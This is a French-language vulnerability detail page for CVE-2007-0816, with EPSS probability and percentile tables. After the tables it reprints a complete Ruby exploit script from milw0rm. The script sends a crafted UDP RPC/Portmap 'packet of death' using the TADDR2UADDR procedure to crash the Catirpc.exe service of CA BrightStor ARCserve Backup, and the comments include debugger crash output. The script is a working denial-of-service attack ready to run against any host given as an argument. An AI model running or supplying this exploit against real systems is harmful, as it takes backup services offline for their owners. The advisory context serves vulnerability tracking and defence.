CVE-2007-0816 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	11%	–	–
2022-04-03	–	–	11%	–	–
2022-05-22	–	–	11%	–	–
2023-03-12	–	–	–	23.96%	–
2023-07-16	–	–	–	24.49%	–
2023-11-05	–	–	–	24.71%	–
2023-12-17	–	–	–	27.15%	–
2024-02-11	–	–	–	27.15%	–
2024-06-02	–	–	–	27.15%	–
2024-08-25	–	–	–	30.84%	–
2024-12-29	–	–	–	52.31%	–
2025-01-19	–	–	–	52.31%	–
2025-03-18	–	–	–	–	13.97%
2025-04-24	–	–	–	–	13.83%
2025-04-24	–	–	–	–	13.83,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	89%
2022-04-03	94%
2022-05-22	95%
2023-03-12	96%
2023-07-16	96%
2023-11-05	96%
2023-12-17	96%
2024-02-11	97%
2024-06-02	97%
2024-08-25	97%
2024-12-29	98%
2025-01-19	98%
2025-03-18	94%
2025-04-24	94%
2025-04-24	94%

#!/usr/bin/ruby # # Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll) # # Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products. # # (7c.350): Access violation - code c0000005 (!!! second chance !!!) # eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308 # eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 # *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve # Backup\CATIRPC.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program # Files\CA\BrightStor ARCserve Backup\CATIRPC.dll - # CATIRPC_2e000000!get_hostbyname+478: # 2e00eda8 668b4602 mov ax,[esi+0x2] ds:0023:00000002=???? # # CATIRPC.dll does not properly handle TADDR2UADDR procedures used in RPC communications with # the CA RPC Server (Catirpc.exe). This leads to a condition where a null memory pointer # is dereferenced. This appears to be only a DoS, but please prove me otherwise. This was tested on # BrightStor ARCserve Backup 11.5.2.0 (SP2) # # (c) Copyright 2007 Shirkdog i # # Author: M. Shirk (Shirkdog) shirkdog_list ^ at % hotmail.com # Thanks to Tebodell for testing # # Greetz to str0ke, Galileo. Metasploit module to follow require 'socket' backup_server = (ARGV[0]) target_port = (ARGV[1] || 111) #RPC/Portmap packet packet_of_death= "\xde\xad\xbe\xef" + # XID "\x00\x00\x00\x00" + # Message Type: Call (0) "\x00\x00\x00\x02" + # RPC Version: 2 "\x00\x01\x86\xa0" + # Program: Portmap "\x00\x00\x00\x03" + # Program Version: 3 "\x00\x00\x00\x08" + # Procedure: TADDR2UADDR (8) "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + #Credentials and Verifier all NULL "\x46\x9b\x22\xe2" + # Portmap data "\x00\x00\x00\x00" + # Nulls that get processed during address shifting "\x00\x00\x00\x00" + "\x00\x00\x00\x00" puts "[+]Computer Associates (CA) Brightstor ARCServe Backup Remote Procedure Call Server DoS (catirpc.dll)\n" puts "[+]Author: Shirkdog\n\n" if (!(backup_server && target_port)) puts "Usage: catirpcdos.rb host port (default port: 111)\n" exit else puts "[+]Sending UDP Packet of Death...\n" sock = UDPSocket.open sock.connect(backup_server, target_port.to_i) sock.send(packet_of_death, 0) puts "[+]Done...\n[+]Catirpc.exe is dead\n[+]... or it will die in a few seconds for you inpatient bastards\n" end # milw0rm.com [2007-02-01]